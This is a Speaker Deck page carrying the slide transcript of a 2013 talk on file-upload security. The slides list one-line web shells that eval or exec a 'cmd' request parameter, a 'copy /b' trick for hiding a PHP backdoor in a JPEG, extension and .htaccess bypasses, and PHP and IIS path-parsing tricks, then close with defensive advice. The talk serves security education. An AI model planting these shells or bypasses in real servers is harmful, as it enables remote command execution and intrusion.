Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Best Practices - The Upload

Orange
August 21, 2024
0
10

Best Practices - The Upload

Webconf 2013

Orange

August 21, 2024
Tweet

More Decks by Orange

See All by Orange
Security in PHP 那些在滲透測試的小技巧
p8361
0
11
網頁安全 Web Security 入門
p8361
0
17
Bug Bounty 獎金獵人甘苦談 - 那些年我回報過的漏洞
p8361
13
36k
那些 Web Hacking 中的奇技淫巧
p8361
16
14k
關於 HITCON CTF 的那些事 之 Web 狗如何在險惡的 CTF 世界中存活?
p8361
6
12k
PHPConf 2013 - 矛盾大對決
p8361
53
28k
0-Day 輕鬆談 - Happy Fuzzing Internet Explorer
p8361
15
12k
駭客看 Django
p8361
25
12k

Featured

See All Featured
CSS Pre-Processors: Stylus, Less & Sass
bermonpainter
354
29k
Docker and Python
trallard
39
3k
The Mythical Team-Month
searls
218
43k
Building Better People: How to give real-time feedback that sticks.
wjessup
359
19k
The World Runs on Bad Software
bkeepers
PRO
64
11k
Responsive Adventures: Dirty Tricks From The Dark Corners of Front-End
smashingmag
248
20k
The Pragmatic Product Professional
lauravandoore
31
6.2k
Why You Should Never Use an ORM
jnunemaker
PRO
53
8.9k
Creatively Recalculating Your Daily Design Routine
revolveconf
215
12k
Designing for humans not robots
tammielis
248
25k
How To Stay Up To Date on Web Technology
chriscoyier
786
250k
個人開発の失敗を避けるイケてる考え方 / tips for indie hackers
panda_program
89
16k

Transcript

  1. 2013/01/13 @ WebConf <[email protected]>

  2. • aka Orange • 2009 • 2011, 2012 • 2011

    AVTOKYO • 2012 PHP Conf • 2012 VXRLConf • – – Web Security – Windows Vulnerability Exploitation

  3. • CHROOT Security Group • NISRA • Disclosed – MS12-071

    / CVE-2012-4775 • http://blog.orange.tw/
  4. None
  5. None

  6. 1. Reconnaissance – Google Hacking, Reversed Whois, AXFR …… 2.

    Scanning – SYN/ACK Scan, TCP NULL/FIN/Xmas/Mainmon/Window Scan, SCTP INIT Scan, Hydra, Nessus …… 3. Gaining Access – Heap/Stack/V-table Overflow, ROP, Heap Spray, System Misconfiguration, Metasploit, Exploit Database …… 4. Maintaining Access – Privilege Escalation, Trojan, Backdoor, Rootkit, Code/DLL Injection, API Hook, LD_PRELOAD, Anti AV/Debugger …… 5. Clearing Tracks – Syslog, WTMP/UTMP, Event Log, Shell(Bash/Explorer) ……
  7. None

  8. – Upload? – Web log? Dabase log?

  9. • • – <?php eval( $_REQUEST[cmd] );?> – Runtime.getRuntime().exec( cmd

    ) – <%eval request("cmd") %> – __import__('os').system(cmd)

  10. https://github.com/evilcos/python-webshell/

  11. None
  12. None
  13. None
  14. None
  15. None
  16. None
  17. None

  18. http://www.lu-chen.com/

  19. None
  20. None

  21. • – PHP CGI PATH_INFO • – /index.php/module/login – /index/module/login

    • – /userfiles/mypic.jpg – /userfiles/mypic.jpg/nihao.php

  22. • – Huffman table – EXIF • – copy /b

    rst.jpg+backdoor.php dst.jpg • – http://orange.tw/exif.jpg
  23. None
  24. None

  25. • • • •

  26. • – – – • – php phtml php3 php4

    php5 – asp asa cer cdx shtml – aspx asax ascx ashx asmx http://www.hitcon.org/download/2010/5_Flash Exploit.pdf#Page.20
  27. None

  28. – AddHandler application/x-httpd-php .jpg • – .php*

  29. None

  30. https://speakerdeck.com/allenown/the-internet-is-not-safe-webconf-taiwan-2013

  31. https://www.facebook.com/TWWDB

  32. (htaccess ^ ^)

  33. • • – user.jpg  .jpg – user.php.jpg  .jpg

    – user.php.xxx  .php – user.php.xxx.ooo  .php
  34. None

  35. • – IIS < 7 – Asp.net ^__< • –

    http://webconf.orange.tw/files/a.asp/user.jpg • – http://webconf.orange.tw/files/user.asp;aa.jpg user.asp;aa.jpg
  36. None
  37. None

  38. filename Content-Type File header

  39. None

  40. • Update your sense and software. • User controlled filename

    is always dangerous. – Whatever filename, extension or temporary filename. • Use Image library to valid or strip the image. • Disabled the directory’s execution permission you uploaded to.

  41. • • – htaccess • – Apache – IIS •

  42. None

  43. Q & A

  44. [email protected]